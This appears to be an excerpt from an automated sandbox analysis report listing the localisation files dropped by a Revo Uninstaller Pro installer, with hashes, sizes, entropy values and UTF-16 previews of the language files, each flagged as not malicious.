                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.H.r.v.a.t.s.k.i./.C.r.o.a.t.i.a.n. .....W.e.b.L.a.n.g.=.H.R.....T.r.a.n.s.l.a.t.o.r.=.H.a.s.a.n. .O.s.m.a.n.a.g.i.......C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...1...8.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .I.z.g.l.e.d.....1.0.3. .=. .P.o.s.t.a.v.k.e.....1.0.4. .=. .D.e.i.n.s.t.a.l.e.r.....1.0.5. .=. .A.l.a.t.i.....1.0.6. .=. .P.r.e.s.r.e.t.a.n.j.e.....1.0.7. .=. .P.o.p.i.s.....1.0.8. .=. .I.k.o.n.e.....1.0.9. .=. .D.e.t.a.l.j.i.....1.1.0. .=. .D.e.i.n.s.t.a.l.i.r.a.j.....1.1.1. .=. .U.k.l.o.n.i. .u.n.o.s.....1.1.2. .=. .O.s.v.j.e.~.i.....1.1.3. .=. .U.k.l.o.n.i.t.i. .o.z.n.a...e.n.i. .u.n.o.s.?.....1.1.4. .=. .D.e.i.n.s.t.a.l.i.r.a.t.i. .o.z.n.a...e.n.i. .p.r.o.g.r.a.m.?.....1.1.5. .=. .D.o.g.r.a.d.n.j.a.....1.1.6. .=. .P.o.m.o.......1.1.7. .=. .U.p.u.t.e...........
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (675), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):134684
                                                                                                                                            Entropy (8bit):3.6263066482370334
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:WuphjkIdd/DdEIK0maAmDwQPVC0fwodhjAMX+907+AjwVm+MV8iW8HjJkSADPUFj:huPUTmK
                                                                                                                                            MD5:9D502EA4D293E8CDD722B1CC120ACE31
                                                                                                                                            SHA1:004732BAADE360FB190885B26C8D0F477B89935D
                                                                                                                                            SHA-256:D362840E3245B77979D529C10C755E21AF193F0406BD850D813673E17D888A26
                                                                                                                                            SHA-512:29261C915860319189B31C72C581B33C1F4967C2D77B924A8FCD530930E8B2C418030FC55993A188E5EC956D75D3F91BE89F4E25C31FC4A9DA005FC6B6F134D7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.M.a.g.y.a.r./.H.u.n.g.a.r.i.a.n.....W.e.b.L.a.n.g.=.H.U.N.....T.r.a.n.s.l.a.t.o.r.=.D...b.r...n.t.e.i. .S...n.d.o.r. .-. .s.a.n.d.o.r...d.o.b.r.o.n.t.e.i.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .N...z.e.t.....1.0.3. .=. .B.e...l.l...t...s.o.k.....1.0.4. .=. .E.l.t...v.o.l...t.......1.0.5. .=. .E.s.z.k...z...k.....1.0.6. .=. .K.e.r.e.s.Q. .m...d.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.o.k.....1.0.9. .=. .R...s.z.l.e.t.e.k.....1.1.0. .=. .E.l.t...v.o.l...t...s.....1.1.1. .=. .B.e.j.e.g.y.z...s. .t...r.l...s.e.....1.1.2. .=. .F.r.i.s.s...t...s.....1.1.3. .=. .B.i.z.t.o.s. .b.e.n.n.e.,. .h.o.g.y. .t...r.l.i. .a. .k.i.j.e.l...l.t. .b.e.j.e.g.y.z...s.t.?.....1.1.4. .=. .B.i.z.t.o.s. .b.e.n.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (717), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):127392
                                                                                                                                            Entropy (8bit):3.4614005609864864
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:locWzmYvaewluEO21T4oOdCWKWdOvHLu1ab9YVU/yfIyN07kr5VRQ2BNi4ZVRENz:Yulu0hCdOvHqb95cB3k5k
                                                                                                                                            MD5:59F2A36A20215347BEB58ACB7CEABA53
                                                                                                                                            SHA1:40C01D8893E698F802095D8ED5CD6CC05A4B7A0B
                                                                                                                                            SHA-256:30388CC2C429EFB94253B926C64BE4D167C2F362DB09300AC4554520DF419C56
                                                                                                                                            SHA-512:DF87473B891803D14592C53E2EC5878DCD0391B51991D712BAE4F9E0B5F5C2819B510009448F8B516AE926BDF551B43DFD8F524B549D6476E5608F6C919E83A2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.B.a.h.a.s.a. .I.n.d.o.n.e.s.i.a./.I.n.d.o.n.e.s.i.a.n.....W.e.b.L.a.n.g.=.I.N.D.....T.r.a.n.s.l.a.t.o.r.=.P.u.r.w.o. .A.d.i. .N.u.g.r.o.h.o.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .L.i.h.a.t.....1.0.3. .=. .P.i.l.i.h.a.n.....1.0.4. .=. .P.e.n.g.h.a.p.u.s.....1.0.5. .=. .P.e.r.a.l.a.t.a.n.....1.0.6. .=. .M.o.d.e. .P.e.m.b.u.r.u.....1.0.7. .=. .D.a.f.t.a.r.....1.0.8. .=. .I.k.o.n.....1.0.9. .=. .R.i.n.c.i.a.n.....1.1.0. .=. .H.a.p.u.s.....1.1.1. .=. .H.a.p.u.s. .C.a.t.a.t.a.n.....1.1.2. .=. .S.e.g.a.r.k.a.n.....1.1.3. .=. .A.p.a.k.a.h. .a.n.d.a. .y.a.k.i.n. .i.n.g.i.n. .m.e.n.g.h.a.p.u.s. .c.a.t.a.t.a.n. .t.e.r.p.i.l.i.h.?.....1.1.4. .=. .A.p.a.k.a.h. .a.n.d.a. .y.a.k.i.n. .i.n.g.i.n. .m.e.n.g.h.a.p.u.s. .p.r.o.g.r.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (662), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):142466
                                                                                                                                            Entropy (8bit):3.396814543249537
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:eNJzHR1iVUz5T/mHE+fs1eEDVUcdPNjVlKEhL98UAueg8fC:kJzHTX5TeHE+f+eEDVNdPhVlKwZ8dgaC
                                                                                                                                            MD5:71BAA3C894A26E3C285262E34960F6C8
                                                                                                                                            SHA1:33509E1740D10D7FD813F353BDE5BC1DB4A699B0
                                                                                                                                            SHA-256:9B287843DA49B5975FEA024EA51BD68AA8B03A9946F3CF043201D524033F77DF
                                                                                                                                            SHA-512:A7E40761892BC379CE907BA55E3AA4E9AE0DA50454DB8D2BBC89467E5F66A031B740B654362AEA2189F8DEC5AD759456890B991719886D75D74DFAB508929F1B
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):77404
                                                                                                                                            Entropy (8bit):5.228699203430081
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:84p2dHm7WVI3NNRdZKxCJNFYsWXrQ2YjnW9Xq3iQSa0qqMyeqXLRZEvAcrNcV5Gx:j2dHgWWfRdZbNF/WXrQ2YLW963iQSa0+
                                                                                                                                            MD5:040C2D8EBC17DACAF936A472088110A4
                                                                                                                                            SHA1:A8CA607E209452B7886F6E9CBEAA7253623496FE
                                                                                                                                            SHA-256:2F2DC8C8727EC6C1E4898E150A8CD962F394C37ECEF6838CE0807CE8363A9358
                                                                                                                                            SHA-512:3AD8367F4F2A52BD6B975AFDED53BDEC5A25439DADB81DFC78A67626F7250C284A6BA5AF73F489FD94734CC178D9F3217D34F4C73A9A6109636CA09BC100DB59
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):77282
                                                                                                                                            Entropy (8bit):5.344405966542523
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lohuLfu+X83GXjDzy48AISFuPm553g6R6JCezMzd4ytJ7r2BtEaClqc:ACfu+X83GXjPyx9Sn53g6R6JO7EMlqc
                                                                                                                                            MD5:9B08D7938D6B83218D43FA1F884D821A
                                                                                                                                            SHA1:D8B4B40502954521DDA2955C2CC0919B80CB8188
                                                                                                                                            SHA-256:88B117C0F2A37A375F86EF3C686288C954A88F4647230DE58C47D7532FFC7115
                                                                                                                                            SHA-512:4E471F55D3D65D196202415071797E855AA2A93B26D25128686D5A68BF04A9D0307D4C3B22179A3B55384918819524B1ECD46CAD9DE0C9C406529A82F41764CE
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (531), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):69202
                                                                                                                                            Entropy (8bit):3.580198978681514
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lojEDwthZmIwWc3bBtbD0ANX8If2WDafbdoV4XL26VZiIJBPbdBnXPaei7:s+hX18bBRD2
                                                                                                                                            MD5:2CE2A032457DDD8E1DC8868CC1C75A48
                                                                                                                                            SHA1:9229850C65FA487A26C9FE4DDA51C302533C195B
                                                                                                                                            SHA-256:0AF0D6E4657ED06CCD5AE0FB5E8E3BFBE0CE3950757F1AC109C1104DB051F98F
                                                                                                                                            SHA-512:3D1EBA1104A15189EDC30033D7EA011E9F2EB623941464238506F487D58CBA87A05B3CC2E8860FF5CCAB0CD637796AF49A132CBF21C7B3E2F2F6004BE6B0935C
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (484), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):110288
                                                                                                                                            Entropy (8bit):3.9383295798946234
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4seY/kLsTdMxIxQazH+KM5N59cSvvbbuig36p7Ne8hVudV1vNWM3ktFRDlxD8ygB:jeY/6xIxQazH+KM5N59cSvvbbuig3SuD
                                                                                                                                            MD5:B78738D6771FCA62516F8EB15C9460DB
                                                                                                                                            SHA1:69D6F4193A9CD53776162E491BA0C78CDAE77966
                                                                                                                                            SHA-256:A93CFABCDCC7D9876EBD2BD3775E77EE4B194870A981588F747BC01F7EC86FB5
                                                                                                                                            SHA-512:5CCE82FCA675751A9E22C0F15C938C237B15E63422DE436A6E448D34F8FB8819E9F41E4F01B5117983F615B38029363FC7B1DBC58B7B9268BC1B54294A803652
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (435), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):116584
                                                                                                                                            Entropy (8bit):3.4724567340731216
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:FW7jQkbLU+miBrdji6E+X4teDexIa073UCYIRWq13rSsVLYU4:Mbi
                                                                                                                                            MD5:D5A24F2D5AE12A843240E354EB26BCD6
                                                                                                                                            SHA1:A2BD707D7195CD1A3163D4F33750457F5D889DE9
                                                                                                                                            SHA-256:FF3F554C0F9249C1F76E7E9B2F4CA8EDE2CA42459BE3BE37A483DEC10D64F73E
                                                                                                                                            SHA-512:533F1FF1D5414A1941C408BB29B855B2D1851CE05C5EFEA24B9D4AFA7232933CC08BB67DFCCBA4F4B3C0798F934AC4452730A1164C17ECAE0C6C8BE69D0ABCF4
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (1970), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):121434
                                                                                                                                            Entropy (8bit):3.814439127324583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:loaWsQeVjoYi8L0q1NzZ08iZnDt9+b311fUiXMkISCNXLz3UhUp:cr4oYi8L0q1c8MDv+bl1fhyBz3so
                                                                                                                                            MD5:3C10E3A4E879163DC1AC916D3AAE316C
                                                                                                                                            SHA1:3F5D75D837EF2490AB6C5B035855766443DF5A4B
                                                                                                                                            SHA-256:7173C74A1CD8F6AE7AEABF34A4AFA18DA73D1E595850C06953BF70CA8326F3D0
                                                                                                                                            SHA-512:14538BDFE3DFE2EE7DA9FF84E7E13B591732F0161622C203DB487009A6CB23E2760BEC5459B5FAD620184F2CC19F09D5865DF8F03C51BFD44A18C4CEE73AE03C
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (512), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):125354
                                                                                                                                            Entropy (8bit):3.6916938529521914
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:loKRrsLkYOChte3GW00OKansDxs1ugPaqP9L97jcpvqRtNCOuvMYrcmPulvhvFNO:GRJnsDyYgP5P9LWEZBPCzAObr
                                                                                                                                            MD5:00E4EA38C09BE2C82D4062345B74C975
                                                                                                                                            SHA1:1644834E917EF74EF374C63D740076C61B18F07F
                                                                                                                                            SHA-256:20F8BDF0C06B31434AD9A6D515477A86D84E758490E47DB1724E358A48A650F3
                                                                                                                                            SHA-512:7CFC2B303F1B8CB25B63B726491A0062F2184D7E2A60911EB3235E3E8F50167610C043F2C3E0DF32C6DE76C454D2D74597F286988D87BE3D81259AAC3426CE18
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (772), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):140588
                                                                                                                                            Entropy (8bit):3.4494661461016882
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:L3UBZgoBUk7SJAW+UMwHdaIaSnutDxbheao+fBpdaA1a16Q1D5DerB2Tm:YghYgnutD7/
                                                                                                                                            MD5:500FBED3543879F343C8081B2FDF1FF5
                                                                                                                                            SHA1:AC859C7013C87DD824C73ED77970BD973762EEE0
                                                                                                                                            SHA-256:9436996BABA11BC3CFD246CEB4C3F70185806A5612027990D6999F469E09AC5E
                                                                                                                                            SHA-512:D1337F8723E5C3FAD06AFF44E2DE82D7DC9A42614C7F88C465BE28665EEF2374DE75C788D335112CAF54F24562354D2B03175EBC7E567FEE60522E6EA1A1BCFE
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (772), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):125262
                                                                                                                                            Entropy (8bit):3.4481536085983775
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:MOghAQX7wHPV3eonAqBL2h2OUFD5LVpi9:lghv5oK
                                                                                                                                            MD5:B5AA8BE80DAE51043BA6408D1D6B107E
                                                                                                                                            SHA1:6BE2B588839C87B3D8F25C3F5BEB7975AECB98E0
                                                                                                                                            SHA-256:E20F73F5E342B823B79F1C8C4D7EEF101A09127DB0700FCD79FDEF43F3CC25D7
                                                                                                                                            SHA-512:7CBFFEF592359D953A12788C558EF6AB31B468AA5ECC774FD3D22E3279C82DBAF16B1849F1B99A820F189FA36FFFA4564A2C3D7EC5042EB191FF390BB943828C
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (724), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):131952
                                                                                                                                            Entropy (8bit):3.471989974502818
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:FrEbxaRaTtwkYAUc0tPNfKp+2MS1TXjUiU8v908:6bxaRaTqkVU3lNfKp+2MS1TXjUZWt
                                                                                                                                            MD5:BA3D16BF985F428DAB06AAA6CE7CE7B4
                                                                                                                                            SHA1:C8980ECE865ECD907A0FE43B8D2E898BE3276DFF
                                                                                                                                            SHA-256:F17E90AAC63F2E9630C81D73B9756A41B951874C44A483AA4E354D013E70D8B8
                                                                                                                                            SHA-512:0140E007F63F4BB84F6340C153E21138504292B1EA6EA7483747212CF4D437C5D449FE10989B4E341D9B3554B20BD780EBADC3D61C481FB25BB3F6653A1557CD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h. .....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.P.o.r.t.u.g.u...s. ./. .P.o.r.t.u.g.u.e.s.e.(.B.r.a.s.i.l.).....W.e.b.L.a.n.g.=.P.T.-.B.R.....T.r.a.n.s.l.a.t.o.r.=.H...l.i.o. .d.e. .S.o.u.z.a. ./. .R.u.l.i.e.n. .O.l.d.a.n.i.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .E.x.i.b.i.r.....1.0.3. .=. .O.p.....e.s.....1.0.4. .=. .D.e.s.i.n.s.t.a.l.a.d.o.r.....1.0.5. .=. .F.e.r.r.a.m.e.n.t.a.s.....1.0.6. .=. .M.o.d.o.\.n.C.a...a.d.o.r. .....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.c.o.n.e.s.....1.0.9. .=. .D.e.t.a.l.h.e.s.....1.1.0. .=. .D.e.s.i.n.s.t.a.l.a.r. .....1.1.1. .=. .R.e.m.o.v.e.r. .e.n.t.r.a.d.a. .....1.1.2. .=. .A.t.u.a.l.i.z.a.r. .....1.1.3. .=. .D.e.s.e.j.a. .r.e.m.o.v.e.r. .a. .e.n.t.r.a.d.a. .s.e.l.e.c.i.o.n.a.d.a.?.....1.1.4. .=. .D.e.s.e.j.a. .d.e.s.i.n.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (746), with CRLF, CR line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):138760
                                                                                                                                            Entropy (8bit):3.5938846070402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:HN2MUMqfeZIyimlMWqCZLhewtbOIYe/1ifCWUINoE/hOsbg00p:t9UKXZ1eSjVA/U
                                                                                                                                            MD5:C76ADB4BB2BDB3722F0D0AA395F16262
                                                                                                                                            SHA1:B4594519DD221ECAEFC0D90909157F9C124811CE
                                                                                                                                            SHA-256:4635B47EFC36101D5AC7BBE3D529EF4850A2785CA59B8DD08541873D2579C083
                                                                                                                                            SHA-512:ABB1FCA558326124605D24B79670871B30E91977F1DA14DEC36AE61B5D3B53FB294ED80A3EF111B138B2970F9D3D22C7FAAB810A87613CD035614D4A05D69F33
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.R.o.m...n... ./. .R.o.m.a.n.i.a.n.....W.e.b.L.a.n.g.=.R.O.....T.r.a.n.s.l.a.t.o.r.=.A.l.e.x.a.n.d.r.u. .B.o.g.d.a.n. .M.u.n.t.e.a.n.u.,. .M.a.r.i.n.e.l. .C.i.p.u.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.e.d.e.r.e.....1.0.3. .=. .O.p...i.u.n.i.....1.0.4. .=. .D.e.z.i.n.s.t.a.l.a.t.o.r.....1.0.5. .=. .U.n.e.l.t.e.....1.0.6. .=. .V...n...t.o.r.....1.0.7. .=. .L.i.s.t.......1.0.8. .=. .I.c.o.a.n.e.....1.0.9. .=. .D.e.t.a.l.i.i.....1.1.0. .=. .D.e.z.i.n.s.t.a.l.e.a.z.......1.1.1. .=. ...n.l...t.u.r.......1.1.2. .=. ...m.p.r.o.s.p...t.e.a.z.......1.1.3. .=. .S.i.g.u.r. .v.r.e.i. .s... ...n.l...t.u.r.i. .i.n.t.r.a.r.e.a. .s.e.l.e.c.t.a.t...?.....1.1.4. .=. .S.i.g.u.r. .v.r.e.i. .s... .d.e.z.i.n.s.t.a.l.e.z.i. .p.r.o.g.r.a.m.u.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (770), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):136156
                                                                                                                                            Entropy (8bit):3.9772752876308854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:Ugzuz4NjXBv1p4Yo2PklcxThfaZE2kYK1X5+P3b1rIdkXmU+g9X:Ug86XBv1p4Yo2PklcxThfaZE2DP3b1rX
                                                                                                                                            MD5:A3F615CEE1B2AB1423853E0DCE67812C
                                                                                                                                            SHA1:80EF64ABB8D7C8DBDEA00FD5552956F1750F3FF5
                                                                                                                                            SHA-256:C4A2025D189CB616B4CFC45BAC348CF36D583964EA1936DF309C03CDA5C0104C
                                                                                                                                            SHA-512:5D4C7AEA6E50B1DD4BE63357F04C3C1DA148BF6D5F8A55E797B405046EDBB8CF9858407F6A663F78A372992D6888A64ADB6AAE605C21C6B9ABF750CAAA18EDC9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e. .=. . .C.A.A.:.8.9./.R.u.s.s.i.a.n.....W.e.b.L.a.n.g.=.R.U.S.....T.r.a.n.s.l.a.t.o.r. .=. .V.S. .R.e.v.o. .G.r.o.u.p.,. .e.d.i.t.e.d. .b.y. .L.u.b.e.r.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r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
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (436), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):96936
                                                                                                                                            Entropy (8bit):3.9548685823094414
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:Mlyvi0HQGqlUfM9T4xYIvZttVc1bVBuqqe25IHo06TVp0DK9k8hLoS60thmlLqtK:Mlyvi0HQGqlUfM54xYIvZttVc1bVBuqZ
                                                                                                                                            MD5:8A38541BEFDD4A83B3413AF88AB27792
                                                                                                                                            SHA1:977AE354F1D8529384C241B87232BAAD2A9217C5
                                                                                                                                            SHA-256:D005F31F65527C1C409B1B43BA1BD0020310C1DDCAB58964BE5F763037F0314D
                                                                                                                                            SHA-512:C1D954B632DF9DB0F7788E10074BF32DFC306B6D933EBE0A8F778FD831EBFB5DD4908B411430B911515E2AA676C8244E45B3BC4574793B62B193FDACDAECA080
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.!.@.?.A.:.8./.S.e.r.b.i.a.n. .....W.e.b.L.a.n.g.=.S.R.B.L.T.....T.r.a.n.s.l.a.t.o.r.=.D.r.a.g.a.n. .B.j.e.d.o.v. .d.r.a.g.a.n.b.j.e.d.o.v.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.3...1...1.............[.D.e.i.n.s.t.a.l.e.r. .L.i.n.i.j.a. .s.a. .a.l.a.t.k.a.m.a.].....1.0.2. .=. ...7.3.;.5.4.....1.0.3. .=. ...>.A.B.0.2.:.5.....1.0.4. .=. ...5.8.=.A.B.0.;.5.@.....1.0.5. .=. ...;.0.B.8.....1.0.6. .=. ...@.5.A.@.5.B.0.Z.5.....1.0.7. .=. ...8.A.B.0.....1.0.8. .=. ...:.>.=.5.....1.0.9. .=. ...5.B.0.Y.8.....1.1.0. .=. ...5.8.=.A.B.0.;.8.@.0.X.....1.1.1. .=. .#.:.;.>.=.8. .C.=.>.A.....1.1.2. .=. ...A.2.5.6.8.....1.1.3. .=. .#.:.;.>.=.8.B.8. .>.7.=.0.G.5.=.8. .C.=.>.A.?.....1.1.4. .=. ...5.8.=.A.B.0.;.8.@.0.B.8. .>.7.=.0.G.5.=.8. .?.@.>.3.@.0.<.?.....1.1.5. .=. ...>.3.@.0.4.Z.0.....1.1.6. .=.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (446), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):97878
                                                                                                                                            Entropy (8bit):3.537880363749942
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:woApxpwVcmmL4Htk5SWgduiI/Qyi+9QEo62eTLDme0HLZzzAiY+4mc0MzpUnjhq4:sxpcCSWV/Qa7vb0HFHlbRcVzqt6pTkd
                                                                                                                                            MD5:6FF7FBB4F81CEF6CEE58E8A9A3973B23
                                                                                                                                            SHA1:FDAA6816A3172EB4FB336B364B7DCDEC9F807412
                                                                                                                                            SHA-256:E57B607071C548D701BDD2700D7D70B554FA27292CAE1043F622597235CBA1EF
                                                                                                                                            SHA-512:FD623CA0205134A94C8D8A46722F6623802C55C69F22DD83F6C4DA32107337BEA20A5B4BE4307151327FF6D5AEFB0FDABB323D903B7789F42CD4907C6E49DDB3
                                                                                                                                            Malicious:false
